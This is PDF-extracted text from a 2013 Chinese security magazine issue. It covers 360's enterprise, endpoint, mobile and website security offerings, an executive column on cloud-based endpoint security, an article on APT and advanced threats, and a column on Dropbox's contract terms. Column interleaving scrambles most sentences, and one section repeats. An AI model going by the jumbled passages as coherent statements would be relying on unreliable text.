信息来源： 360互联网安全中心 企业安全解决方案

1. 企业内部安全解决方案 2) 沙盒机制检测 信息来源 ：360互联网安全中心 通过边界 +云端 +终端的解决方案，解决传统 通过虚拟执行引擎、高启发引擎、文件信誉云 安全防护检测手段单一、性能瓶颈、维护成本 引擎、URL信誉云引擎、QEX 和 AVE文件和漏 拒绝。即使这个木马利用了 0day，甚至有数 动报警。这样，就算普通员工的计算机被突 高、响应速度慢、应对手段单一问题。在云端 洞特征引擎、RVI 协议分析引擎。基于云计算 字签名，也会被自动检测出来，从而有效防 破了，想要获取公司机要数据还是非常困难。 安全中使用到分布式存储、分布式计算 / 并行 和大数据技术，利用机器学习等人工智能方法， 范未知的威胁。 计算、机器学习技术、准实时处理。边界方案 4) 实时监控和预警 对数百亿文件和恶意网页进行鉴定，实现对未 中通过信息采集，进行协议还原对通信进行准 2) 定制私有黑白名单 知文件和攻击的检测。鉴定程序、文档、压缩 入管理，攻击阻断。终端安全中实现网络准入 对终端进行实时监控，用户掌握过去每一台 包和网址，高度启发和准确的规则，鉴别恶意 控制、程序准入控制、硬件准入控制。 根据企业独有的合规性需求，自定义文件的 终端的文件活动（包括文件什么时候出现、 行为。 黑白属性，形成私有黑白名单。同时，提供 在什么终端出现、文件路径、文件名、公司名、 1.1. 边界防御 数字签名、文件大小等），并了解防护范围实 1.2. 云端防御 灵活的工具构建并更新安全基线。 在企业边界部署边界防御系统，抓取和分析网 时的情况，快速鉴定恶意软件从何而来并立 把云安全体系移植进企业内网，让企业用户享 络出口流量，并将样本和可疑 URL送入沙箱， 3) 分级安全策略 即阻止恶意软件继续运行。 受云安全技术带来的高效及便利。建立私有云 对样本进行分析。不需要完全依赖于已知的特 安全系统为企业打造的高度可控云安全解决方 根据不同的安全要求，预设安全区域分为核 征码，而是在沙盒机制中依赖样本执行过程当 未知文件出现时管理员可获得及时通告预警。 案。面对企业复杂的网络环境，提供内网云安 心区、办公区、客户区、自由区几种分级， 中发生的行为事实，检测来自邮件、网页、下 全服务，能最大限度保障业务系统和数据安全， 每个分级应用不同的安全策略。这种分级既 1.3. 终端防御 载等的APT 攻击，可以准确地发现使用 0day 有效降低资源占用和运营成本。 保证了核心区的安全，也满足了企业对安全 1) PC 终端解决方案 等未知漏洞发起的攻击行为。 控制的灵活程度的需求。 1) 基于白名单技术 1) 网络嗅探模块 为解决缺乏统一终端管理的安全问题，建议 比如 ：跟业务数据相关的核心服务器，可以 使用简单高效的管理控制中心，统一管理终 使用白名单技术，默认只允许白名单中的文 抓取和分析网络出口流量，并将样本和可疑 在同一套系统下享受更高规格的安全保护， 端的安全软件，解决企业对安全统一管理的 件被执行，不在白名单中的文件都会自动被 URL送入沙盒进行分析。 未经管理员认证的程序，一律禁止运行并自 需求，能够提供全网统一体检、杀病毒、补

088 ｜ 互联网安全 互联网安全 ｜ 089 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

丁修复、开机加速、软件管理、发送公告、 · 下载安装应用前，细心留意应用权限 终端的防御解决方案，通过建立基于大数据 有些网站使用版本陈旧的程序，服务器操作 流量监控、IT 资产管理等功能，解决企业用 分析，多层次的检测防护方式，构成防御 APT 系统也不注意更新补丁，存在大量广为人知 当前，通过篡改、伪装正常应用威胁手机安 户普遍的网络安全问题，让网络安全管理变 攻击的体系架构。 的漏洞，当然会轻易被黑客利用入侵，成为 全的恶意软件，实际会在安装权限中有细微 得很简单。同时，还能有效减少移动应用和 傀儡主机。 体现，如要求获取的权限与正常应用的获取 2. 企业网站安全解决方案 APT攻击带来的威胁。 列表有明显不同，如莫名要求得到敏感高危 网站安全是一个综合性、多元化的问题，包 3) 严谨的测试流程 此外通过基于白名单的“非白即黑”软件准 权限等，为此，建议用户在下载安装应用前， 括系统安全、数据安全、交易平台安全等， 在任何网站应用上线前，都应从安全角度进 入技术，实现对终端的严格安全管控，只有 细心留意应用权限，避免被获取后威胁手机 全方位解决安全问题需要完善的管理机制和 行测试，去除不必要的风险因素。 在白名单中的软件方可安装和运行。 安全。 专业技术保障。360网站安全检测平台建议， 网站应该从以下四个方面提升安全性 ： 在用户交互环节，更应注意控制权限，过滤 2) 移动终端解决方案 · BYOD解决方案 可能出现的威胁。 2.1. 强化网站安全意识 纵观 2012 年的手机安全形势，从持续激增的 有效地管理和控制自带设备的网络访问，提 1) 由专业技术人员进行安全维护 2.2. 定期进行网站安全检测 数据，到不断出现的新特点，都预示着用户 高自带设备用户的使用体验和工作效率。提 供了接入点、控制器、安全、网络管理等所 一些网站管理者认为，“在网络中不断部署防 将面临更多、更为严重的安全威胁。为此 360 有些网站的 WEB 程序是外包开发的，而且网 有必需的基础设施和基础架构，可帮助创建 火墙、入侵检测系统、入侵防御系统等设备， 互联网安全中心强烈建议广大手机用户，提 站程序的开发人员没有安全编程经验，极易 安全、高性能、支持更多设备访问的网络。 就可以提高网络的安全性”。其实这样的认 高手机安全意识，通过如下四大建议确保用 造成各种漏洞。 识存在误区，网站安全性低下根本原因在于， 户手机安全。 · 利用通过 MDM 集成实现的附加安全层保 2) 及时为服务器操作系统和网站程序打好 传统的网络安全设备难以抵御应用层的攻击， · 尽量选择正规渠道购买手机 护移动设备 补丁 最有效的网站安全解决方案是修复漏洞。

报告显示，水货手机是目前木马和恶意软件 · 了解接入网络的人员、设备及位置，确保 图 的主要传播源头，其多会在出货前被“刷机” 适当人员具有对适当信息的适当访问权限 2 植入吸费、流氓推广木马等，且由于已嵌入 · 基于网络和端点的设备识别和感知 系统底层，很难通过常规方式卸载清除。为此， 360手机安全专家建议用户在购买新手机时应 · 对以有线或无线方式从设备传输到控制器 尽量选择大型正规卖场购买手机，购买手机 或接入交换机的数据提供安全保护并进行 后，建议安装如“360 手机卫士”等专业安全 加密 产品对其进行扫描，避免手机暗藏恶意软件。 · 通过灵活的授权逻辑满足所有组织的策略 · 选择正规站点、渠道下载应用 访问控制需求

报告指出，通过下载应用而感染恶意软件的 · 结合使用现有智能基础设施和可扩展的灵 比例惊人，为保护用户的正常下载安全，360 活实施机制

安全专家建议用户尽量选择专业、可信的应 1.4. APT 攻击检测防御 用市场、官网，以及如 360 手机助手、360 软 传统的防火墙、入侵检测和防护系统等技术， 件宝盒等经过安全检测的渠道下载应用。 难以有效发现 APT攻击 ；以上边界 + 云端 + 信息来源 ：360互联网安全中心

090 ｜ 互联网安全 互联网安全 ｜ 091 SECURITY INSIGHT 2013.11 报告 REPORT www.securityinsight.com

在网站安全检测方面，360 网站安全检测平 测外，还可在第一时间为高危 0day漏洞提 网站卫士的流量清洗和攻击识别过滤，将非 台提供了集“漏洞检测”、“挂马检测”和 供修复建议。 正常的网站请求过滤掉，保证网站的正常请 “篡改检测”于一体的一站式免费服务平台， 2.3. 实时监控网站安全状况 求访问。 拥有国内最全的网站漏洞检测库及强大的 网站被挂马篡改，会降低用户对其的信任度， 通过此类云防护方案，企业网站可以做到“零 蜜罐集群检测系统，能够识别常见 WEB 服 更严重危害网络安全造成不良影响。此外， 部署、零安装”，能够快速将企业网站接入到 务器软件如 Apache、IIS、ngnix等的一 些 360 网站安全检测平台提供了实时的挂马监控 云防护平台中，最大限度地减少部署安全防 常见安全漏洞 ；对 SQL注入漏洞和跨站脚 和篡改监控功能，一旦发现网站被挂马被篡 护机制中所需的人力、财力成本，实现实时 本 (XSS)漏洞有较为准确的识别能力 ；能够 改，能够自动以邮件等方式通知站长，将网 高效稳定的整体安全防御。 对常见的 WEB安全配置问题，如目录列表、 站蒙受损失的风险降到最低。 管理页面暴露等常见安全配置漏洞进行检

图 4

图 3

信息来源 ：360互联网安全中心

信息来源 ：360互联网安全中心 信息来源： 360互联网安全中心

2.4. 建立网站云防御体系 相对于传统安全厂商的网站安全解决方案， 力，加入 360网站卫士的网站会自动隐藏自 下载报告全文：http://isc.360.cn 如 360网站卫士提供了一种新的“隐身”模式， 己的 IP 地址，网站卫士将自己的 IP 信息暴露 集成了DDOS攻击拦截系统、CC 攻击拦截系 在外面，黑客和网站攻击者无法找到网站的 统、网站加速系统、抗攻击 DNS系统，单服 真实 IP 信息，所有的 DDOS攻击和 web入侵 务器抗 DNS攻击性能达到 500万 QPS 防护能 都会经过 360网站卫士的服务器，经过了 360

092 ｜ 互联网安全 互联网安全 ｜ 093 SECURITY INSIGHT 2013.11 专 栏 COLUMN www.securityinsight.com

终端安全，从云端做起 邮件，点开文档，攻击者就可以进入到这个人的电 终端安全，从云端做起 脑里，再把这个人的电脑作为跳板，进入企业网， 在这里，我想与各位分享一些360对安全趋势 攻击具有更高权限的电脑。所以，今天网络安全里 和技术的理解。 终端安全变得越来越重要。

两周之前，我参加了用友公司 CTO/CIO们最担心 终端安全未来会变得越来越重要。做路由器、 下一代互联网，包括物联网、无线互联网，未 的用户大会，现场汇聚了很多企业 安全 防火墙的公司特别希望在企业边界的地方来部署安 来的终端设备会从PC转到手机。手机都未必是未 CIO、CTO，很多传统企业都迫切 全。 现在，我们看到一个趋势，传统的防火墙、 来互联网的中心。未来各种各样智能设备、可穿戴 地希望更多地了解互联网，了解互 我把所有的业务都放在云上，是 路由器在服务端上的安全做得相当好，使得现 设备、智能硬件，包括家电、汽车、单位里的工业 联网对他们的企业会有什么影响， 不是安全？把我所有的数据都集中 在大量的攻击，大量的入侵越来越多地发生在应 控制设备，都可能成为像智能手机一样的智能设 如何利用互联网去迎接未来。 了，一旦出现数据泄露，数据是否 用层，而不是发生在网络底层。换句话说，在 备，这意味着它们都有可能会面临攻击者的挑战， 安全？员工都使用移动设备接入企 网络边界处已经很难实时地去判断它是不是一个 也会变得日益难以防范。 业网络，而像手机这样的移动设备 威胁，是不是一个攻击，因为很多攻击和威胁只 四个关键词 周鸿祎 都是个人资产，在这种情况下，他们 有在终端电脑上才会真正地发挥作用。 在过去几年里，360一直专注加强终端安全， 360公司董事长兼CEO 用个人设备来访问企业敏感的信息， 但360所定义的终端安全与传统杀毒软件是不一样 在与这些CIO、CTO们交流的时 企业是否安全？当企业员工在使用 我举一个例子。我们以前做了很多防止数据 的，我们认为所谓终端安全更多的是感知和捕获安 候，我发现有最热门的四个关键词： 各种社交媒体与网络的时候，我的 泄露的安全措施，设计了很多方案，比如防止通 全威胁，及时处理安全威胁，但并不是依靠终端来

企业是否安全？ 过U盘泄漏信息。但今天你不可能不让员工使用 判断它是不是安全威胁的，判断的任务交给云去处 第一个关键词是云。无论是私有 网络相册、网上存储。各种各样的云服务实际是 理。这是因为第一移动设备的特点是低功耗、低计 云，还是公有云；无论是个人用的 CIO与CTO的担忧表明，下一 给企业的安全边界打开了很多缺口。还有，绝大 算能力，无法对新的攻击做出复杂的判断。第二， 云服务，还是企业用的云服务。 个五年、十年新的技术给我们带来 部分公司都不得不允许员工使用自己的移动设备 如果从一台终端孤立地看，你很难判断一些行为到 无限向往未来时，网络安全会变得 进入公司，而这些手机都可以连接企业Wi-Fi， 底是真正的木马病毒，还是用户的误操作，或者未 第二个关键词是大数据。也就是 更加重要，网络安全挑战也会更加 都具备3G上网的能力，这些手机相当于在原先严 知软件的行为。要真正解决终端安全，还是要云端 把很多分散的数据集中在一起，进 严峻。 密保护的企业边界上打开了无数的缺口。因此， 做起，从大数据做起。 行智能处理和分析，通过数据分析 在新技术、新设备的冲击下，企业的安全边界的 来发现未来的趋势。 原来 360聚焦在个人电脑的安 概念已经变得非常模糊。 （本文来自360公司董事长兼CEO周鸿祎的演讲内容） 全，这几年很多企业希望360提供 第三个关键词是Mobile。今天， 企业安全服务。我们也投资购并了 近几年出现的攻击案例，比如某超级大国对 手机和未来各种各样智能设备、 一些网站安全的公司，也在大力发 伊朗核工厂的渗透，某大国最近指责称受到某大 移动设备会成为访问网络的主要终端 展移动安全解决方案，所以现在360 国的网络攻击。分析这些案例，你会发现今天的 和主要入口。这些智能设备随时移 不但给个人消费者提供安全服务， 网络攻击，最典型的，都是在终端处对某些关键 动，无时不在，always online， 而且也在移动和企业安全上做了大 性的个人进行攻破和渗透。今天，要攻破一个敏 这是未来企业部署技术时必须考虑 量投入。我们的收入增长得比较快， 感单位的要害服务器，要穿越防火墙的技术防 的重要因素。 市值也比较高，这样我们能在国内外 御 ，难度已经非常高了。但这些敏感单位的员 采购一些先进的技术，也能从民间 第四个关键词是社交网络。无论 工，如果他忘了给电脑打补丁，或者用比较旧 和安全行业招募到大量的顶尖的安 企业员工，还是企业本身，都会大量 的IE浏览器，或者存在一个新的0day漏洞，对 全技术人员。 使用社交网络。在美国是Facebook 手只要发一个邮件，当敏感单位的员工打开这个 和Twitter，在中国是微博和微信。

094 ｜ 互联网安全 互联网安全 ｜ 095 SECURITY INSIGHT 2013.11 专 栏 COLUMN www.securityinsight.com

2. 植入针对性恶意软件，旨在窃取信息和钱财 4. 未授权和未管理的自带设备（BYOD）潮流， 高级威胁现状和应对技术浅淡 提供了进入网络的后门 与其他的敌对方一样，网络犯罪分子不断变 得越来越狡猾。如今，犯罪组织在改动国家层面 大型BYOD计划从企业自己的防火墙里面，将 的恶意软件，以便为自己所用。由于震网（ 成千上万个消费级设备带入到了企业网络上。许多 2013年，《华盛顿邮报》、《 要保护的对象。不过，我们的网络 Stuxnet）和红色十月（Red October）等狡猾 设备遵守安全政策，而另一些设备在越权行事。受 华尔街杂志》、《纽约时报》和彭 在迅速发生变化，网络设备和用户 的恶意软件四处蔓延，它们最终落到了犯罪分子 到保护的信息在每时每刻离开我们的网络，常常是 博新闻社先后与美国国防承包商、 也在随之变化。并非所有的设备或 的手里。遗憾的是，网络犯罪分子一直致力于借 通过隐密的加密隧道。 各大互联网公司和能源公司成为受 用户都是受欢迎的。全球各地众多 助逆向工程手段来模仿这些高级威胁。从事企业 害者：它们都遭到了黑客入侵，黑 企业和组织的网络上潜伏着多个敌 间谍行为的不法分子早已学会了如何利用Zeus 客采用了高级威胁和针对性攻击等 对方。不妨看一下其中最主要的几 银行特洛伊木马窃取文档的功能，偷偷实现其目 手段。 类敌对方： 的，而且能够屡屡得逞。截至今日，Zeus特洛伊 5. 别国政府植入的针对性恶意软件，旨在窃取信 木马已从全球诸多银行客户处窃取了数亿美元。 多年来，我们建立了牢固的网 息或知识产权 John Vecchi 银行特洛伊木马套件现在很容易被改成窃取企业 络边界和复杂防火墙规则，不让敌 Blue Coat 产品战略副总裁 数据的恶意软件。 人靠近——在此期间采用了越来越 我们在2013年已看到了别国政府从事企业间谍 1. 僵尸网络和恶意软件“伺机感 多的安全单点产品，希望比攻击者 活动的行为大幅增加。近几个月，红色十月、震网、 染”，黑客没有明确的目标 抢先一步。现在，攻击者们借助目 Flame和Duqu的曝光表明了财力雄厚的敌人轻而 标明确的网络钓鱼攻击或高级Web 易举就能闯入全球网络。2013年2月1日，《华盛 伺机而动的恶意软件是指没有明 浏览器安全漏洞，完全突破了这些“ 3. 窃取机密的黑客活动分子，进而公开危害组 顿邮报》承认自己遭到了黑客攻击。那是知名新闻 确目标的一种恶意软件，它们每天 坚固堡垒”的防线。一旦他们进入到 织或企业 组织在同一周内宣布被黑的第四例——无不声称中 都在感染上网浏览的用户。它常常 我们的网络，就留了下来。 国黑客渗入到其网络的深处，伺机搜寻机密信息。 包括用来发送垃圾邮件或用来发动 两年前，到处肆虐的Anonymous和LulzSec 点击劫持（clickjacking）的典型 高级持续性威胁（APT）之所 黑客组织令世人震惊，更让人震惊的是发现许多 2013年及以后，别国政府编写的更复杂的恶意 僵尸网络。伺机性恶意软件的目标 以高级，原因在于它们能长驱直入 安全网络上居然潜伏着远程访问工具（RAT）。 软件无疑会出现在美国企业网络上。 往往是扩大僵尸数量，而不是攫取 ——72%的这类威胁在短短几秒钟 RSA安全公司的SecurID遭黑客攻击，进而让 被感染端点具有的价值。比如说， 或几分钟内就能攻陷目标。APT APT得以在整个联邦军事系统屡屡得逞；这无疑 DNSChanger僵尸网络激活了点 之所以持续，原因在于它们逗留很 意味着一个事实：情况在发生变化，且在迅速发 击劫持攻击，直到2012年被消灭， 长时间——72%的这类威胁在数周 生变化。再加上HBGary Federal安全公司中了 它总共先后感染了400多万个设备。 、数月甚至数年后才被人发觉。我 Anonymous的招，世人得以了解某些黑客活动 “非预防”时代的新要求 就在今年年初，微软公司和赛门铁 下面将着重介绍高级威胁和针对性 组织拥有高超的攻击技能。半年前，一手策划“ 克公司携手美国司法部法警局，帮 攻击，另外介绍了查找和挫败这些 燕子行动”（Operation Ababil）的黑客活动组 助摧毁了Bamital僵尸网络，这场 这些敌人，加上如今的企业网络面临的受攻击 威胁所需要的新兴安全工具。 织利用复杂的分布式拒绝服务（DDoS）攻击， 覆盖全球的网络犯罪行动劫持了近 面越来越大，势必需要我们重新考虑防御策略。在 实际上害得美国各大银行的网上业务陷入瘫痪。 100万台PC，用于实施其“点击欺 如今这个非预防时代，我们再也不能否认现实：黑 前不久美国联邦储备委员会遭到Anonymous的 诈”阴谋。如今，这些伺机性感染 客成功闯入戒备森严的网络是不可避免的。被盯上 入侵再一次证明，黑客活动分子在受害者眼里无 了解攻击者与攻击对象 被更高级的威胁所取代。 的企业和组织其范围在一天天扩大。 疑是强大的敌人。

想解决眼下高级威胁领域的问 过去保护我们的安全解决方案不再有效，尽管 题，就需要了解攻击者以及我们所 很久以前可能有效。想预防企业内外的敌人造成的

096 ｜ 互联网安全 互联网安全 ｜ 097 4. 未授权和未管理的自带设备（BYOD）潮流， 提供了进入网络的后门

大型BYOD计划从企业自己的防火墙里面，将 成千上万个消费级设备带入到了企业网络上。许多 设备遵守安全政策，而另一些设备在越权行事。受 到保护的信息在每时每刻离开我们的网络，常常是 通过隐密的加密隧道。

5. 别国政府植入的针对性恶意软件，旨在窃取信 息或知识产权

我们在2013年已看到了别国政府从事企业间谍 活动的行为大幅增加。近几个月，红色十月、震网、 Flame和Duqu的曝光表明了财力雄厚的敌人轻而 易举就能闯入全球网络。2013年2月1日，《华盛 顿邮报》承认自己遭到了黑客攻击。那是知名新闻 组织在同一周内宣布被黑的第四例——无不声称中 国黑客渗入到其网络的深处，伺机搜寻机密信息。

2013年及以后，别国政府编写的更复杂的恶意 软件无疑会出现在美国企业网络上。

“非预防”时代的新要求

这些敌人，加上如今的企业网络面临的受攻击 面越来越大，势必需要我们重新考虑防御策略。在 如今这个非预防时代，我们再也不能否认现实：黑 客成功闯入戒备森严的网络是不可避免的。被盯上 的企业和组织其范围在一天天扩大。

过去保护我们的安全解决方案不再有效，尽管 很久以前可能有效。想预防企业内外的敌人造成的

SECURITY INSIGHT 2013.11 专 栏 COLUMN www.securityinsight.com

谁能窥视你基于云环境的数据？ 安全泄密和数据丢失事件，再也不切合实际。这 如何取胜：有效安全方法和 Thomas J. Trappler 知名云计算风险消减顾问 也不应该是我们的工作重心，因为这迫使我们目 光短浅地着眼于网络边界。一旦攻击者通过高级 CRIME

针对性攻击，突破了网络边界，他们也就控制了 美国国家安全局（NSA）的“棱镜”监视计划恰恰表明了你需 近几个月由于越来越多得逞的安全泄密事件公之 我们的网络。现在需要一种多管齐下的现代防御 要确保云服务合同保护你的数据，以免被第三方访问。 于众，我们显然需要有效的检测控制措施。目前，敌 体系；我们必须及早发现和揭露这些网络渗入事 对国家和网络黑客的重心继续放在窃取信息上。最近 件，以免它们窃取我们最宝贵的数据，因而给我 这些攻击觊觎价值非常高的、防御非常到位的目标， 们的企业造成重大损失。网络攻击者可能已经潜 覆盖众多行业垂直领域，包括国防承包商、航空航天 伏在我们的网络上，所以我们必须致力于获得情 业、石油天然气行业、政府、金融、各大制药公司 是不是谁都能访问你交给云计 所以合同应该明确： 概览部分内容如下： 境和可见性，这是找到并消灭对手所需要的。 和各大银行。 算提供商保管的数据？这个问题 问得好，关于美国国家安全局（ 我们禁止 Dropbox 的员工浏览 但我们正取得进步，尽管步伐缓慢。由于许 提供商的哪些员工可以访问 公司安全防线会被攻破，我们应该致力于更快 NSA）的“棱镜”计划的新闻事 你存储在你的 Dropbox 帐户中 多组织适应如今的“非预防”时代，遭遇针对性 数据。 的文件内容，仅允许他们浏览 更早地发现感染，而不是任由感染持续数周、数月 件更是突现了这个问题的重要性 攻击和安全泄密事件是免不了的，这个事实现在 文件元数据（比如文件名和位 甚至数年。想确保误报率很低，关键在于真正深入 。那么，你如何通过与云计算提 访问是不是遵循“最小权限” 已被戒备极森严的企业和组织所接受。正因为如 置）。与大部分在线服务类似 地了解网络流量——要考虑到内容、情境和元数据。 供商签订的合同，最有效地应对 此，现在大家向“积极防备”转变。伴随这种转 和“必须知道”的基础。 ，出于我们的隐私政策中所述 借助类似APT的攻击，黑客们留下了多道后门。所 这些问题呢？ 的原因（比如法律要求的情况 变而来的是需要网络可见性、安全分析和威胁情 当员工离开提供商或者换一 以，为了确保剿灭高级威胁和攻击，必须发现并铲 下），我们的一小部分员工必 报，那样才能应对越来越危险的威胁。高级恶意 除所有这些隐患。为了确保成功，我们开发了一套 就云计算而言，数据访问免不 份工作岗位时，是不是立即、完 须拥有访问用户数据的权限。 软件和零日攻击越来越狡猾，势必需要一种新的 CRIME方法。应对网络威胁的CRIME方法包括：了 了是客户与云计算提供商共同承 全地取消那些权限。 但那是极为少有的特例，而不 方法：这种方法包括大数据安全情报和分析以及 是惯例。我们有严格的政策和 解情境（Context）、查明根源（Root Cause）、 担的一项责任。那些共同承担的 高级威胁防护技术，以便能够有效地找到威胁和 授予访问权的方式。 技术访问控制，以禁止员工在 确定影响（Impact）、缓解风险（Mitigation）和 责任需要在合同中予以明确，而 威胁，同时提供数据包、流量和文件等层面的可 访问是不是得到记录、监控 这些特例之外的情况下访问用 消灭威胁（Eradication）。你只有了解网络事件、 大多数云计算提供商的标准合同 见性，进而了解网络上出现的数据渗漏和恶意软 户数据。 异常情况和攻击的情境，才能查明根源，确定影响， 还有待改进。 或分析。 件渗入。这种新方法不仅带来了可见性，以便了 并开始采取有效的风险缓解和消灭措施。 解迄今为止还没有被发现的威胁和攻击，还提 虽然云计算提供商负责为客户 不妨看一下Dropbox的服务 要是Dropbox进一步详细描述其 供了一种强有力的泄密后安全系统，可以缓解 在过去，我们的重心一直放在符合标准上，我 提供访问其自己数据的便利，但 条款安全概览（https://www.- “严格的政策和技术访问控制”， 风险。 们的同行把标杆设到相当高的高度，致力于达到该 云计算提供商还应根据合同有义 dropbox.com/terms#secu- 那就更好了，但这样的措辞似乎 高度。遗憾的是，游戏规则已发生了变化，敌人轻 务不与其他人共享客户的数据， rity），看看这家云计算提供商 已相当合情合理。但之后， 在以往，企业的IT安全策略一直是添加一层 松越过了我们设定的标杆。我们必须提高标杆；工 不管这种共享是有意还是无意。 是如何应对这个问题的。（我将 Dropbox的服务条款隐私条款 层新的预防措施。普通企业建起了相当庞大的堡 作重心应该放在有效安全方法上，这包括找到并消 这个道理似乎很明显，但是下列 以Dropbox的标准合同为例， （https://www.dropbox- 垒，光在网络上就部署了十多种安全技术。不 灭没有被我们目前的防御机制发现的威胁。想在如 方面有些细节问题需要处理好： 倒不是找这家公司的岔子，而是 .com/terms#privacy）随后 过，由于黑客成功地绕过了几乎每一层防线，只 今的高级威胁领域获得有效安全，我们就需要安全 内部访问 因为Dropbox的条款在业内颇 表述： 要攻击者拥有资源，又有强烈的动机，那么一座 情报、可见性和情境，才能提高效率，缩短威胁和 具代表性。值得一提的是， A+级安全堡垒与一座F-级安全堡垒在预防针对 攻击的机会窗口。此外，我们需要更深入地了解攻 为了向你提供签约服务，云计 Dropbox在电子边疆基金会于 我们可能借助某些值得信赖的第 性攻击的能力方面的差异并不大。这就是为何许 击者，那样才能建立挫败对方的现代化策略。 算提供商的一些员工可能需要访 2013年发布的《谁支持你？》 三方公司和个人，帮助我们提供 多企业和政府部门眼下认识到过时的安全方法已 问你的数据。你就要确保这种访 报告中得到了排名第二的评分。 、分析和改善服务……这些第三 不够有效。 问仅限于必要的最低限度信息， 方可能访问你的信息，但只用于

098 ｜ 互联网安全 互联网安全 ｜ 099 SECURITY INSIGHT 2013.11 专 栏 COLUMN www.securityinsight.com

代表我们执行这些任务，而且遵守类似该隐私政 我们依据 AES-256标准对你存储在 Dropbox 上的 策中那些义务的义务。自该政策生效那天起，我 文件进行加密，该标准与银行用于保护客户数据的 们使用亚马逊的S3夏令服务来存储你的一些信息 加密标准为同一标准。 《互联网安全》公开向业界技术专家、用户和信息安全技术爱好者征稿。 （比如你的文件）。 作为360公司主办的信息安全技术刊物，《互联网安全》致力于打造分享与交 不过，并未提及客户在任何敏感数据方面想要 流信息安全技术的开放平台：深度专题分析、月度重要新闻荟萃、技术趋势与 第三方的引入让情况变得复杂起来。虽说 获得的详细或保证程度。想了解客户应该考虑的云 动态、安全技巧分享、研究报告、观点分享… Dropbox明确了其中一个第三方（亚马逊）是好 计算提供商安全方面的更多细节，请参阅我的专栏 事，但要是它明确所有第三方，要是它郑重承诺 文章《云计算合同顾问：确保你的信息安全》。 这是份什么样的刊物？ 事先会通知任何变化，要是第三方遵守与“该隐 私政策中一样的”、而不是“相似的”义务，那 有意的外部访问 一份影响高端人士的杂志！ 就更好了。 杂志发行对象是国家信息安全主管部门、各企业信息安全主管、安全技术人员、 这涉及到云计算提供商与访问客户数据的任何 各大高校计算机与网络教师，以及信息安全专家。 无意的外部访问 政府（比如“棱镜”计划）要求或其他合法要求有 一份专注于安全技术与趋势的杂志！ 关的义务。我在之前的文章中已阐述了其中一些义 杂志希望通过热点安全事件报道、安全技术分析与介绍、安全产品剖析、安全故 由于云计算提供商将把你的数据存储在其基 务，但这回不妨看看一些标准的云计算提供商合同 事分享，帮助国内企业用户了解互联网安全的最新趋势，以及应对方案。杂志里 础设施上，以及/或者在其基础设施上处理你的数 语言，看看我们面临什么情况。就这点而言， 没有公关稿，没有软文，都是有用的干货。 据，提供商应该有义务采取适当的、具体的措施 Dropbox的服务合同隐私政策表述如下： ，确保已部署了足够有效的措施，保护数据，远 需要哪类文章？ 离黑客或其他外部威胁。 如果我们有足够理由相信，公开你存储在 Dropbox 中的文件以及我们收集的你的相关信息在以下情况 内容：深度专题分析、热点互联网安全事件报道、安全技术分析与介绍、安全 是合理必要的，我们可将这些资料公开给 Dropbox 产品剖析、企业安全故事分享、安全技巧分享、技术趋势分析判断…..当然也可 Dropbox的服务条款表述： 之外的有关方：（a）符合法律、法规或强制性的 以分享安全人生活的八卦有趣信息! 你对你的全部资料的维护和保护负全部责任， 法律要求；（b）保护任何人员免受死亡或严重的 篇幅：每篇千字以上，只要内容言之有物，篇幅不限，只是别让我们一期刊登 Dropbox 概不负责。对于你的资料的任何丢失或 身体伤害；（c）防止针对Dropbox或其用户的诈骗 不完。 损坏，Dropbox 概不负责。 或侵犯；或者（d）保护 Dropbox的产权。如果我 们按上述情况将你的 Dropbox文件提供给执法机构， 我们将在提供文件之前解除 Dropbox对文件的加密。 撰稿人可得到什么回报？ 是不是觉得这样的条款有点不公正？连共享 但是，Dropbox不能解密你在将其存储至 Dropbox 承担责任的意思提都没提？遗憾的是，这种条款 之前已加密的任何文件。 1、关注：一篇技术深度文章可能会让你脱颖而出，受到安全技术界各方面的关注。 在云计算提供商的标准合同中并不罕见。当然， 2、成长：在繁忙工作之外，给自己时间去关注思考安全技术的发展。撰稿是 客户希望提供商为确保所提供服务的安全承担起 这并不让人觉得这家提供商会竭力捍卫其客户 学习、总结和沉淀的好方式。 一定的责任。Dropbox的服务条款隐私政策在这 的权利。关注的焦点似乎更放在提供商单方保护自 3、腐败经费：编辑部会给撰稿人提供稿费，让您外出腐败多些经费。 方面的确有所让步，内容表述如下： 己及自身权利上。尤其让人不安的是，它告知，作 来联系我们吧！ 为交易条件之一，它还会解除之前强调的加密措施。 总有一种方式可以找到我们 在信息传输过程中以及信息接收后，我们都将根 但这家提供商告知，客户在与提供商共享数据之前， 据普遍认可的标准来保护提交给我们的信息。但 信箱： [email protected] 总是可以对数据进行加密，以免任何不需要的访问， 是，没有任何电子传输或存储方法是100%安全 飞信群：80475728 QQ群： 301501430 的。因此，我们不能保证信息的绝对安全。 这倒令人感激。 飞信： 135409731 公众微信：互联网安全大会 微博：中国互联网安全大会 扫扫我

至少可以说，细节方面有点模糊不清。而大多数 客户在通过洽谈，以改进这些问题方面的合同 人也没有要求“绝对安全”，只想知道提供商在 语言面临艰巨的任务。但为了云环境中的敏感客户 保证某种“合理”的安全级别方面做得如何？服 数据和关键功能，从长远来看，完全值得为此付出 务条款安全概览确实表示至少提供这种保证： 艰辛的努力。

100 ｜ 互联网安全 互联网安全 ｜ 065